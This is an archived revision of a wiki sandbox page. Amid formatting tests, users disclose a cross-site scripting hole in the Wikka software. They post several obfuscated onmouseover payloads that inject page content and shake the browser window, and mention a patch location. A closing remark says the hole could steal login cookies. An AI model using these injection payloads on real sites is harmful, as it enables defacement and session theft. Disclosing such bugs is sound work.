Revision [13535]
This is an old revision of SandBox made by 24.4.117.21 on 2006-03-17 13:33:02.
Test your formatting skills here
See also:
Note: this server is configured to use a western charset encoding (ISO-8859-1). This results in non-western characters being stored as unicode entities and displayed as such in the edit screen. To learn more on different charset support, please refer to WikkaLocalization.
Read this first- New to Wikka? Start WelcomeUser here.
Note: this server is configured to use a western charset encoding (ISO-8859-1). This results in non-western characters being stored as unicode entities and displayed as such in the edit screen. To learn more on different charset support, please refer to WikkaLocalization.
You are free to play with Wikka's FormattingRules syntax on this page. Double click anywhere to open the edit screen.
Please do not remove the main header and this paragraph while editing the page and start editing under the horizontal rule BELOW
yeah
Please make sure that the server has write access to a folder named uploads.
hello test
www.google.de google
WikiPedia
Testing
Dieses Leben ist eins der besten. Aber wie sind die anderen?Testing
Testing
<include iostream>
#include <math.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include "glm.h"
typedef struct _cell {
int id;
int x, y;
float min, max;
float value;
float step;
char* info;
char* format;
} cell;
#include <math.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include "glm.h"
typedef struct _cell {
int id;
int x, y;
float min, max;
float value;
float step;
char* info;
char* format;
} cell;
http://www.qwerty.com
HomePage
mailtop:[email protected]
"onmouseover="alert(String.fromCharCode(73,32,99,97,110,32,114,117,110,32,74,97,118,97,83,99,114,105,112,116,44,32,97,32,98,97,100,32,116,104,105,110,103))" move your mouse over this. To disallow this insert the following line into /formatters/wakka.php after line 251:
For info contact me at sakaru [at] gmail [dot] com
www.yahoo.com.br yahoo sandbox
Note how one has access to anything on the page... sakaru made a good point here! Mouseover the "interesting".
"id="q" Hello
"onmouseover="eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,113,34,41,46,105,110,110,101,114,72,84,77,76,61,34,60,70,79,78,84,32,83,84,89,76,69,61,92,34,102,111,110,116,58,110,111,114,109,97,108,32,110,111,114,109,97,108,32,98,111,108,100,32,49,50,56,112,120,32,65,114,105,97,108,59,116,101,120,116,45,100,101,99,111,114,97,116,105,111,110,58,98,108,105,110,107,59,92,34,62,33,33,68,65,78,71,69,82,33,33,60,47,70,79,78,84,62,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,68,73,86,34,41,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,108,97,115,116,67,104,105,108,100,46,105,110,110,101,114,72,84,77,76,61,34,60,70,79,78,84,32,83,84,89,76,69,61,92,34,102,111,110,116,58,110,111,114,109,97,108,32,110,111,114,109,97,108,32,98,111,108,100,32,49,50,56,112,120,32,65,114,105,97,108,59,116,101,120,116,45,100,101,99,111,114,97,116,105,111,110,58,98,108,105,110,107,59,92,34,62,72,79,79,87,69,69,33,33,60,47,70,79,78,84,62,34))" Interesting
"onmouseover="eval(String.fromCharCode(119,105,110,100,111,119,46,115,104,97,107,101,61,110,101,119,32,102,117,110,99,116,105,111,110,40,41,123,119,105,110,100,111,119,46,109,111,118,101,66,121,40,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,41,59,119,105,110,100,111,119,46,114,101,115,105,122,101,66,121,40,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,41,59,119,105,110,100,111,119,46,115,99,114,111,108,108,66,121,40,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,41,59,115,101,116,84,105,109,101,111,117,116,40,34,119,105,110,100,111,119,46,115,104,97,107,101,34,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,49,48,48,41,41,59,125,59,119,105,110,100,111,119,46,115,104,97,107,101,59))" Shake
The two below work together to do something annoying
"id="w"title="eval(String.fromCharCode(119,105,110,100,111,119,46,109,111,118,101,66,121,40,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,41,59,119,105,110,100,111,119,46,114,101,115,105,122,101,66,121,40,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,41,59,119,105,110,100,111,119,46,115,99,114,111,108,108,66,121,40,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,41,59,115,101,116,84,105,109,101,111,117,116,40,34,101,118,97,108,40,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,92,34,119,92,34,41,46,116,105,116,108,101,41,34,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,49,48,48,41,41,59))" Hello
"onmouseover="eval(String.fromCharCode(101,118,97,108,40,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,119,34,41,46,116,105,116,108,101,41))" Testing
Another bug (which as far as I know isn't a security hole like the previous example) is shows here
This can be fixed by entering the following line after line 989 in /wikka.php
This can't be used to run JS because the / in the closing tag gets escaped.
Similairly wikipage/Index/<xmp> also displays the bug. The bet solution I found for this was this line after line 1174 in /wikka.php
It's not really that neat a solution, but it works.
I just realised that there is infact a bug reporting page. I'll leave it to someone else to migrate these comments over.
Thanks for the info. Because cookies are used for username and password, one could access those cookies with JS and then use AJAX to send that info elsewhere, all with the HREF hole above.
